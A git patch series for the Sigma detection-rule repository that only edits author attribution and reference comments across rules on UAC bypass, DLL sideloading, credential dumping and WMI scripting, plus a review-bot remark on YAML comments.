 description: Detects the creation of user-specific or system-wide environement variables via the registry. Which contains suspicious commands and strings
 references:
 - https://infosec.exchange/@sbousseaden/109542254124022664
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/20
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml b/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml
index e4240e42c..e95091dc2 100644
--- a/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml
+++ b/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml
@@ -8,7 +8,7 @@ description: Detects when the enablement of developer features such as "Develope
 references:
 - https://twitter.com/malmoeb/status/1560536653709598721
 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/12
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml b/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml
index 487b79eeb..4b71a7b9f 100755
--- a/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml
+++ b/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml
@@ -5,7 +5,7 @@ description: Detects UAC bypass method using Windows event viewer
 references:
 - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
 - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/19
 modified: 2022/11/25
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml b/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml
index cac6abb8f..099f3cc19 100755
--- a/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml
+++ b/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml
@@ -5,7 +5,7 @@ description: Detects the pattern of UAC Bypass using registry key manipulation o
 references:
 - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
 - https://github.com/hfiref0x/UACME
-author: Omer Yampel, Christian Burkard
+author: Omer Yampel, Christian Burkard (Nextron Systems)
 date: 2017/03/17
 modified: 2022/12/01
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml b/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml
index a9f55b07d..074a35e9a 100644
--- a/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml
+++ b/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2022/03/26
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml b/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml
index 7214854d5..49a89d71e 100644
--- a/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml
+++ b/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/23
 modified: 2022/03/26
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml
index 5d8312511..855a4688e 100644
--- a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml
+++ b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group
 references:
 - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/03/05
 modified: 2022/09/19
 tags:
diff --git a/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml b/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml
index a8276ee81..64dc3d851 100644
--- a/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml
+++ b/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml
@@ -7,7 +7,7 @@ description: |
 This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
 references:
 - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/09
 tags:
 - attack.persistence
diff --git a/rules/windows/sysmon/sysmon_file_block_exe.yml b/rules/windows/sysmon/sysmon_file_block_exe.yml
index 327ba2557..4365401b8 100644
--- a/rules/windows/sysmon/sysmon_file_block_exe.yml
+++ b/rules/windows/sysmon/sysmon_file_block_exe.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set
 references:
 - https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/16
 modified: 2022/09/12
 tags:
diff --git a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml
index 513a3d3cd..6d8b3d558 100644
--- a/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml
+++ b/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious encoded payloads in WMI Event Consumers
 references:
 - https://github.com/RiccardoAncarani/LiquidSnake
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/09/01
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml b/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml
index 9c1f7b3d7..73fafcc56 100644
--- a/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml
+++ b/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml
@@ -6,7 +6,7 @@ references:
 - https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/
 - https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19
 - https://github.com/RiccardoAncarani/LiquidSnake
-author: Florian Roth, Jonhnathan Ribeiro
+author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro
 date: 2019/04/15
 modified: 2022/07/07
 tags:
diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py
index 4dbae9540..6362da032 100644
--- a/tools/sigma/backends/elasticsearch.py
+++ b/tools/sigma/backends/elasticsearch.py
@@ -1,5 +1,5 @@
 # Output backends for sigmac
-# Copyright 2016-2018 Thomas Patzke, Florian Roth, Devin Ferguson, Julien Bachmann
+# Copyright 2016-2018 Thomas Patzke, Florian Roth (Nextron Systems), Devin Ferguson, Julien Bachmann
 
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published by
diff --git a/tools/sigma/backends/humio.py b/tools/sigma/backends/humio.py
index 6347d49f3..9ae20c198 100644
--- a/tools/sigma/backends/humio.py
+++ b/tools/sigma/backends/humio.py
@@ -1,5 +1,5 @@
 # Output backends for sigmac
-# Copyright 2016-2018 Thomas Patzke, Florian Roth, Roey
+# Copyright 2016-2018 Thomas Patzke, Florian Roth (Nextron Systems), Roey
 
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published by
diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py
index afc0fe441..5ac4ee873 100644
--- a/tools/sigma/backends/opensearch.py
+++ b/tools/sigma/backends/opensearch.py
@@ -1,5 +1,5 @@
 # Output backends for sigmac
-# Copyright 2016-2018 Thomas Patzke, Florian Roth, Devin Ferguson, Julien Bachmann
+# Copyright 2016-2018 Thomas Patzke, Florian Roth (Nextron Systems), Devin Ferguson, Julien Bachmann
 
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published by
diff --git a/tools/sigma/backends/powershell.py b/tools/sigma/backends/powershell.py
index 67d347a03..4c584f434 100644
--- a/tools/sigma/backends/powershell.py
+++ b/tools/sigma/backends/powershell.py
@@ -1,5 +1,5 @@
 # Output backends for sigmac
-# Copyright 2016-2018 Thomas Patzke, Florian Roth, Roey, Karneades
+# Copyright 2016-2018 Thomas Patzke, Florian Roth (Nextron Systems), Roey, Karneades
 
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published by
diff --git a/tools/sigma/backends/splunk.py b/tools/sigma/backends/splunk.py
index 7d8ef1eb5..dfffc5ed7 100644
--- a/tools/sigma/backends/splunk.py
+++ b/tools/sigma/backends/splunk.py
@@ -1,5 +1,5 @@
 # Output backends for sigmac
-# Copyright 2016-2018 Thomas Patzke, Florian Roth, Roey
+# Copyright 2016-2018 Thomas Patzke, Florian Roth (Nextron Systems), Roey
 
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published by
diff --git a/tools/sigma/backends/sumologic.py b/tools/sigma/backends/sumologic.py
index 138fd3808..b5ad130c7 100644
--- a/tools/sigma/backends/sumologic.py
+++ b/tools/sigma/backends/sumologic.py
@@ -1,5 +1,5 @@
 # Output backends for sigmac
-# Copyright 2016-2018 Thomas Patzke, Florian Roth, juju4
+# Copyright 2016-2018 Thomas Patzke, Florian Roth (Nextron Systems), juju4
 
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published by
From beebafe9cea0ac8d07777ae7919fc0a5ea431626 Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Wed, 1 Feb 2023 13:22:11 +0100
Subject: [PATCH 2/3] fix: special case
Co-authored-by: phantinuss <79651203+phantinuss@users.noreply.github.com>
---
 .../powershell_script/posh_ps_malicious_commandlets.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml
index d10f2c78a..b9324752b 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml
@@ -27,7 +27,7 @@ references:
 - https://github.com/samratashok/nishang
 - https://github.com/DarkCoderSc/PowerRunAsSystem/
 - https://github.com/besimorhino/powercat
-author: Sean Metcalf, Florian Roth (Nextron Systems), Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali (Nextron Systems), Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems), Austin Songer
+author: Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer
 date: 2017/03/05
 modified: 2023/01/23
 tags:
From 31a5c0848009356cb0b001d346da0d09858769ef Mon Sep 17 00:00:00 2001
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Wed, 1 Feb 2023 14:34:46 +0100
Subject: [PATCH 3/3] fix: reduce author set
---
 .../image_load_side_load_from_non_system_location.yml | 6 +++---
 .../proc_access_win_cred_dump_lsass_access.yml | 2 +-
 2 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml
index 4200548e7..704c535d8 100644
--- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml
+++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml
@@ -3,11 +3,11 @@ id: 4fc0deee-0057-4998-ab31-d24e46e0aba4
 status: experimental
 description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)
 references:
- - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)
+ - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there). Wietze Beukema (project and research)
 - https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/ # WindowsCodecs.dll
 - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll
- - https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md
-author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project)
+ - https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md # XForceIR (SideLoadHunter Project), Chris Spehn (research WFH Dridex)
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/14
 modified: 2023/01/09
 tags:
diff --git a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml
index 7fafb013e..72cbd8fee 100755
--- a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml
+++ b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml
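Review bot: The contributor credits that this hunk moves out of `author:` and into trailing `#` comments on the hijacklibs.net and SideLoadHunter README reference lines are lost the moment the rule is loaded, because YAML parsers discard comments, so any tooling or rule catalogue that reads `author:` will now show a single name for this rule. If keeping those acknowledgements discoverable is the goal, a sentence in the `description:` block or a dedicated metadata field would survive parsing, whereas comment-only provenance is visible only to someone reading the raw file. The detection and falsepositives sections of the rule lie outside the hunk and are unaffected by this change.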
@@ -7,7 +7,7 @@ references:
 - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
 - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
 - http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
-author: Florian Roth (Nextron Systems), Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update)
+author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community
 date: 2017/02/16
 modified: 2023/01/25
 tags: